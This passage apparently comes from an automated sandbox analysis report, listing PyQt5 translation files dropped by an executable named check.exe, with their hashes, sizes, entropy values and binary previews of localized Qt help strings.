SSDEEP:	3:j2wZC4n:CwZ
MD5:	BCEBCF42735C6849BDECBB77451021DD
SHA1:	4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
SHA-256:	9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
SHA-512:	F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`...

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_es.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10704
Entropy (8bit):	4.481291573289571
Encrypted:	false
SSDEEP:	192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
MD5:	9EDF433AB9EE5FC7CF7782370150B26A
SHA1:	A918AE15A0DF187C7789BE8599A80E279F039964
SHA-256:	FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
SHA-512:	88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...\|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_fr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10922
Entropy (8bit):	4.459946393010639
Encrypted:	false
SSDEEP:	192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
MD5:	D520C7F85CC06C66715A2B6622BF0687
SHA1:	47292D068172FBC9DC0D9BE2F479E890A37CE138
SHA-256:	687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
SHA-512:	736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_gl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10891
Entropy (8bit):	4.5087667371046205
Encrypted:	false
SSDEEP:	192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
MD5:	B62C74793741FC386332A59113E8D412
SHA1:	589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
SHA-256:	7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
SHA-512:	D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_hu.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10284
Entropy (8bit):	4.674501432335502
Encrypted:	false
SSDEEP:	192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
MD5:	5A56E9E2ED6ECE3F249D1C2A7EB3B172
SHA1:	D6F079F40FBB813B0293C1D2210BAE7084092FEC
SHA-256:	70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
SHA-512:	28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_it.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10612
Entropy (8bit):	4.458970627057882
Encrypted:	false
SSDEEP:	192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
MD5:	3639B57B463987F6DB07629253ACD8BF
SHA1:	65935A67C73F19FCF6023FB95030A5ACAF9DA21C
SHA-256:	316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
SHA-512:	AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_ja.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7917
Entropy (8bit):	5.680408580146589
Encrypted:	false
SSDEEP:	192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
MD5:	1380A9352C476071BDA5A5D4FED0B6C5
SHA1:	9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
SHA-256:	AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
SHA-512:	EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....\|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_ko.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	5708
Entropy (8bit):	5.698914195742074
Encrypted:	false
SSDEEP:	96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
MD5:	CD15674A652C2BF435F7578E119182F8
SHA1:	AEA22E4A0D21396733802C7AB738DDD03737B7D6
SHA-256:	F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
SHA-512:	88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....\|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...\|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...\|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...\|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_pl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9673
Entropy (8bit):	4.622652249027856
Encrypted:	false
SSDEEP:	192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
MD5:	2B68446B69D9AA40B273D75A581D2992
SHA1:	8A09BD38998543B74E2673478EDD54FB4BBDD068
SHA-256:	CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
SHA-512:	F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.\|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.\|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.\|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_ru.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7288
Entropy (8bit):	5.297177914619657
Encrypted:	false
SSDEEP:	192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
MD5:	794AF445A5D7082D51BD22683449F86D
SHA1:	3A0C369872B112A1572AA17EEB814B168B225D98
SHA-256:	557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
SHA-512:	D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_sk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	4.70568613551943
Encrypted:	false
SSDEEP:	192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
MD5:	75C94E59F1FC5312AE25381C247AF992
SHA1:	E3E5F4582CC5FAFE6DF43644D11484861023C084
SHA-256:	F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
SHA-512:	959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_sl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10363
Entropy (8bit):	4.613473842638716
Encrypted:	false
SSDEEP:	192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
MD5:	3B0AEE27B193A8A563C5CB5C7C4FE60F
SHA1:	C94E832595EC765370553468F87C02DB7E7D138A
SHA-256:	2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
SHA-512:	EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_tr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.68793836539357
Encrypted:	false
SSDEEP:	96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
MD5:	32D6EE3D8EE6408A03E568B972F93BCB
SHA1:	582EE079DBD42000C378E0701D26405750524DBA
SHA-256:	EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
SHA-512:	24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_uk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9750
Entropy (8bit):	5.281035122342072
Encrypted:	false
SSDEEP:	192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
MD5:	90A776917D534B65942063C319573CDC
SHA1:	5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
SHA-256:	497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
SHA-512:	B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_zh_CN.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	6441
Entropy (8bit):	5.790303416386852
Encrypted:	false
SSDEEP:	192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
MD5:	9297A6905B8B1823BF7E318D9138A104
SHA1:	3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
SHA-256:	C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
SHA-512:	01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_zh_TW.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9301
Entropy (8bit):	5.80411750798786
Encrypted:	false
SSDEEP:	192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
MD5:	47C3328D3918CF627112BB6C50E30B86
SHA1:	05705603AB3F28402A6C103E1C41DDFF21D140C0
SHA-256:	3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
SHA-512:	8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_hu.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.6255640074603277
Encrypted:	false
SSDEEP:	3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
MD5:	5A46979B45C67DD6312F33CCEA2ED7BC
SHA1:	4C56836B1FB10D9903B299CBCB925947D515B4C8
SHA-256:	BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
